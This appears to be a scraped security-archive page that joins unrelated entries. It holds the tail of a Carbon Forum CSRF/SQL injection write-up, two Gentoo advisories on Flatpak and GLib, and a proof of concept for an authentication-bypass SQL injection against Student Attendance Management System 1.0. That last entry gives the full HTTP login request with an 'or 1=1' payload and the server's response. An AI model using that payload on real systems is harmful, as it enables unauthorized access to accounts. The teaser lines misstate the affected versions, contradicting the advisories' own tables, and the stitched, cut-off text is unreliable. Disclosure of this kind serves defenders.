文件访问路径前缀 */ "fileManagerListSize": 60, /* 每次列出文件数量 */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键词过滤相关的配置,注释只允许使用多行方式 */ { /* 关键词均支持正则表达式，过多的过滤会影响性能 "fuck" : "f**k", 以上规则表示发表含fuck的内容，会被过滤为f**k "negro" : [false, 30], Don't issue text with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], 以上规则禁止发布含“蛤”的内容，并且尝试发表该内容的用户会被续(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包子" : ["维尼", 30], 以上规则表示发表含"包子"的内容，会被过滤为"维尼"，并且在内容发表成功后，需要再等30秒才能发言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */ }&submit=Save settings##############################################################################################################################################################################Vulnerability #4 : Vulnerable PHPMailer libraryFile: /Carbon-Forum/library/PHPMailer.class.phpVersion: $Version = '5.2.16';#######################################################################################

Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection

Gentoo Linux Security Advisory 202406-2 - A vulnerability has been discovered in Flatpak, which can lead to a sandbox escape. Versions greater than or equal to 1.14.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Flatpak: Sandbox Escape  
     Date: June 22, 2024  
     Bugs: #930202  
       ID: 202406-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Flatpak, which can lead to a  
sandbox escape.

Background  
==========

Flatpak is a Linux application sandboxing and distribution framework.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-apps/flatpak  < 1.14.6      >= 1.14.6

Description  
===========

A vulnerability has been discovered in Flatpak. Please review the CVE  
identifier referenced below for details.

Impact  
======

A malicious or compromised Flatpak app could execute arbitrary code  
outside its sandbox in conjunction with xdg-desktop-portal.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Flatpak users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/flatpak-1.14.6"

References  
==========

[ 1 ] CVE-2024-32462  
      https://nvd.nist.gov/vuln/detail/CVE-2024-32462

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-02

Gentoo Linux Security Advisory 202406-1 - A vulnerability has been discovered in GLib, which can lead to privilege escalation. Versions greater than or equal to 2.78.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GLib: Privilege Escalation  
     Date: June 22, 2024  
     Bugs: #931507  
       ID: 202406-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GLib, which can lead to privilege  
escalation.

Background  
==========

GLib is a library providing a number of GNOME's core objects and  
functions.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-libs/glib  < 2.78.6      >= 2.78.6

Description  
===========

A vulnerability has been discovered in GLib. Please review the CVE  
identifier referenced below for details.

Impact  
======

When a GDBus-based client subscribes to signals from a trusted system  
service such as NetworkManager or logind on a shared computer, other  
users of the same computer can send spoofed D-Bus signals that the  
GDBus-based client will wrongly interpret as having been sent by the  
trusted system service. This could lead to the GDBus-based client  
behaving incorrectly, with an application-dependent impact.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GLib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/glib-2.78.6"

References  
==========

[ 1 ] CVE-2024-34397  
      https://nvd.nist.gov/vuln/detail/CVE-2024-34397

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-01

Student Attendance Management System version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Titles: Student Attendance Management System-1.0 Bypass AuthenticationSQLi## Author: nu11secur1ty## Date: 06/22/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter is not sanitizing well, the attacker can injectdirect queries into the login form and easily bypass the authentication ofthe admin account.STATUS: CRITICAL- Vulnerability[+]Exploits:- Exploit:```POSTPOST /student_attendance/ajax.php?action=login HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4Content-Length: 104Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"Accept-Language: en-USSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*X-Requested-With: XMLHttpRequestSec-Ch-Ua-Platform: "Windows"Origin: https://pwnedhost.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pwnedhost.com/student_attendance/login.phpAccept-Encoding: gzip, deflate, brPriority: u=1, iConnection: keep-aliveusername=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid```[+]Response```HTTPHTTP/1.1 200 OKDate: Sat, 22 Jun 2024 06:37:41 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://www.patreon.com/posts/student-system-1-106665723)## Proof and Exploit:[href](https://www.patreon.com/posts/student-system-1-106665723)## Time spent:01:25:00

Tag

#web